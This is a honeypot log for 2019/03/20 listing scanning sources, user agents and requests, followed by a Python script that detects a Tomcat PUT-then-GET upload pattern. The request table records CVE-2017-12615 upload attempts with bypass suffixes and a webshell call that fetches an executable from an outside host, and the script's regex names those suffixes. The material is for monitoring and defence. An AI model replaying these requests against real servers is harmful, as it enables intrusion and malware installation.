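Honeypot (tentative) observation log
This is the log for 2019/03/20.
The number of accesses was low, but in addition to scans against phpMyAdmin,
I observed accesses targeting the Apache Tomcat vulnerability (CVE-2017-12615).
They appear to PUT and then GET.
Note that
w00tw00t.at.blackhats.romanian.anti-sec:)
appears to be a signature or self-identification.
Total accesses: 40 (change from previous day: -2065)
For certain reasons,
GET / HTTP/1.1
POST / HTTP/1.1
are excluded.
Source IP addresses
Count | Source IP address | Country |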
---|---|---|
1 | 111.115.76.15 | China |
2 | 117.3.69.247 | Vietnam |
1 | 124.120.121.87 | Thailand |
6 | 157.230.84.180 | United States |
3 | 198.167.223.52 | St Kitts and Nevis |
6 | 216.245.197.254 | United States |
3 | 222.85.133.206 | China |
2 | 49.49.242.211 | Thailand |
4 | 60.3.142.83 | China |
6 | 61.155.218.109 | China |
2 | 64.90.186.102 | United States |
3 | 93.174.93.114 | Netherlands |
1 | 94.23.193.110 | France |
User agents
Count | UserAgent |
---|---|
12 | - |
263 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0) |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
336 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
62 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
240 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
62 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 |
76 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 |
2 | Mozilla/5.0 zgrab/0.x |
Requests
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid[.]hognoob[.]se/download.exe | HTTP/1.1 |
3 | GET | /.git/config | HTTP/1.1 |
1 | GET | /horde3/imp/test.php | HTTP/1.1 |
1 | GET | /horde/imp/test.php | HTTP/1.1 |
1 | GET | /imp/test.php | HTTP/1.1 |
6 | GET | /manager/html | HTTP/1.1 |
2 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpinfo.php | HTTP/1.1 |
2 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /proxy.php | HTTP/1.1 |
2 | GET | /user/register/ | HTTP/1.1 |
2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
4 | HEAD | /robots.txt | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |
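
The PUT-then-GET pattern noted above can be picked out of an access log automatically. The following is an added detection example, not part of the original post: it flags PUT requests whose target is a `.jsp` name followed by one of the three suffixes seen in the request table (`%20`, `::$DATA`, `/`), then reports any later GET for the same JSP. The log lines, the documentation IP addresses and the function name `find_put_then_get` are constructed for illustration, and Apache combined log format is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format (documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Mar/2019:10:00:01 +0900] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 404 0 "-" "-"
192.0.2.10 - - [20/Mar/2019:10:00:02 +0900] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 404 0 "-" "-"
192.0.2.10 - - [20/Mar/2019:10:00:03 +0900] "PUT /FxCodeShell.jsp/ HTTP/1.1" 404 0 "-" "-"
192.0.2.10 - - [20/Mar/2019:10:00:04 +0900] "GET /FxCodeShell.jsp?view=x&os=1 HTTP/1.1" 404 0 "-" "-"
192.0.2.20 - - [20/Mar/2019:10:05:00 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "-" "-"
192.0.2.30 - - [20/Mar/2019:10:06:00 +0900] "PUT /notes.txt HTTP/1.1" 405 0 "-" "-"
""".splitlines()

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)"')
# Suffixes seen after ".jsp" in the request table: space (%20), ::$DATA and "/".
EVASION_RE = re.compile(r'^(?P<jsp>.*\.jspx?)(?P<suffix> +|::\$DATA|/)$', re.IGNORECASE)


def find_put_then_get(lines):
    """Return (put_attempts, follow_ups) for JSP upload probes in log lines."""
    put_attempts = []   # (ip, raw_target, normalized_jsp_path)
    uploaded = {}       # normalized JSP path -> set of IPs that tried to PUT it
    follow_ups = []     # (ip, path, True if the same IP also sent the PUT)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, _proto = m.groups()
        path = unquote(urlsplit(target).path)  # drop query, decode %20
        if method == "PUT":
            ev = EVASION_RE.match(path)
            if ev:
                jsp = ev.group("jsp")
                put_attempts.append((ip, target, jsp))
                uploaded.setdefault(jsp, set()).add(ip)
        elif method == "GET" and path in uploaded:
            follow_ups.append((ip, path, ip in uploaded[path]))
    return put_attempts, follow_ups


if __name__ == "__main__":
    puts, gets = find_put_then_get(SAMPLE_LOG)
    for ip, raw, jsp in puts:
        print(f"PUT probe from {ip}: {raw} -> {jsp}")
    for ip, path, same in gets:
        print(f"follow-up GET from {ip}: {path} (same source: {same})")
```

A follow-up GET that returns a 200 status on a production Tomcat host would be the case to escalate; the status code is not checked here because the honeypot tables do not record it.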